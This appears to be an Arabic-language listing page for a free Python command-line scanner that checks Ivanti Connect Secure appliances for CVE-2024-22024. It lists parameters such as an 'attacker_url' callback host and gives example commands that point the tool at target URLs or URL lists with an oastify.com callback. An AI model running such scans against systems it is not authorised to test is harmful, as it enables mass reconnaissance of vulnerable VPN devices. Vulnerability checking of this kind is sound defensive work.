فريق 0d الأمن

فاحص الثغرة CVE-2024-22024

تحقّق مما إذا كان جهاز Ivanti Connect Secure معرّضًا للثغرة CVE-2024-22024.

أداة سطر أوامر بلغة Python تتحقّق مما إذا كان جهاز Ivanti Connect Secure معرّضًا للثغرة CVE-2024-22024.

مجاني سطر الأوامر مفتوح المصدر

الترخيص

مجاني

نظرة عامة

نظرة عامة

CVE-2024-22024

التحقّق من وجود الثغرة CVE-2024-22024 في أجهزة Ivanti Connect Secure.

المعاملات

  • -u أو --target_url: عنوان جهاز Ivanti Connect Secure (ICS) المستهدف، أو ملفٌّ يحتوي على قائمة بالعناوين.
  • -c أو --attacker_url: عنوان المهاجم (يمكنك توليده باستخدام Burp Collaborator أو ngrok، أو عبر رابط فريد من Webhook.site).
  • -t أو --timeout: مهلة الطلب بالثواني (القيمة الافتراضية 3 ثوانٍ).

طريقة الاستخدام

اختبار عنوان واحد:

python .\cve_2024_22024.py -u http://vpn.example.com -c http://potatodynamicdns.oastify.com

اختبار قائمة من العناوين:

python .\cve_2024_22024.py -u .\urls_list.txt -c http://potatodynamicdns.oastify.com

استخدام مهلة مختلفة (5 ثوانٍ):

python .\cve_2024_22024.py -u .\urls_list.txt -c http://potatodynamicdns.oastify.com -t 5

شكر وتقدير

الشكر لمن اكتشف الثغرة.. أما أنا فقد قرأتُ إثبات المفهوم (PoC) وأتمتُّ هذه الأداة فحسب.

موقع فريق 0d